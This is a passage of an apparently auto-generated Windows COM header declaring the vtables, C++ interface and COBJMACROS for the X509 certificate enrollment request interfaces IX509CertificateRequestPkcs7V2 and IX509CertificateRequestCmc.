            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs7V2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *CheckCertificateSignature )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs7V2Vtbl;

    interface IX509CertificateRequestPkcs7V2
    {
        CONST_VTBL struct IX509CertificateRequestPkcs7V2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs7V2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs7V2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs7V2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs7V2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs7V2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs7V2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs7V2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs7V2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs7V2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs7V2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs7V2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs7V2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs7V2_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs7V2_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestPkcs7V2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs7V2_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestPkcs7V2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs7V2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs7V2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509CertificateRequestPkcs7V2_CheckCertificateSignature(This,ValidateCertificateChain)	\
    ( (This)->lpVtbl -> CheckCertificateSignature(This,ValidateCertificateChain) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCmc_INTERFACE_DEFINED__
#define __IX509CertificateRequestCmc_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCmc */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCmc;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab345-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCmc : public IX509CertificateRequestPkcs7
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromInnerRequestTemplateName( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CryptAttributes( 
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TransactionId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_TransactionId( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SenderNonce( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SenderNonce( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ArchivePrivateKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ArchivePrivateKey( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyArchivalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyArchivalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionStrength( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyHash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificates( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCmcVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCmc * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR Value);
        
